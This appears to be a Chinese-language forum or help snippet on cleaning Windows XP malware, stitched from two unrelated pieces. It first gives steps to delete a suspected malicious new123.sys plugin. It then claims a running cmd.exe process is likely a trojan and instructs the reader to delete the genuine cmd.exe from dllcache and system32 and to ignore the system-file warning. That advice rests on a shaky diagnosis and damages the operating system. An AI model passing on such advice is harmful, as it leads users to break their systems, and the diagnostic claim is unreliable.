进入c:\Program Files\Internet Explorer\PLUGINS\目录，删除new123.bak文件，但此时你无法删除new123.sys文件，因为系统正在使用，你有两种方式处理new123.sys文件：

重启机器并进入安全模式对new123.sys进行删除；

当前状态虽无法删除该文件，但可更改new123.sys的文件名为new123.sysdel，并且重启机器（无需进入安全模式）后，再把new123.sysdel进行删除。

处理完后，如果“症状描述”中的情况消失，则说明清除成功。

XP系统里并没有cmd.exe的进程，cmd.exe是XP系统的命令提示符程序，可以执行一些在DOS下执行的应用程序，但是并不会随系统启动时运行，这有可能是个木马或者其他病毒程序，建议查杀

1、如果安装文件就在硬盘上，而且系统是从硬盘的安装目录装的，那先将这个安装目录改个名字

2、删除c:\winnt\system32\dllcache\cmd.exe，

3、然后再删除system32\cmd.exe

4、系统会提示说系统文件丢失要求插入光盘，忽略就行了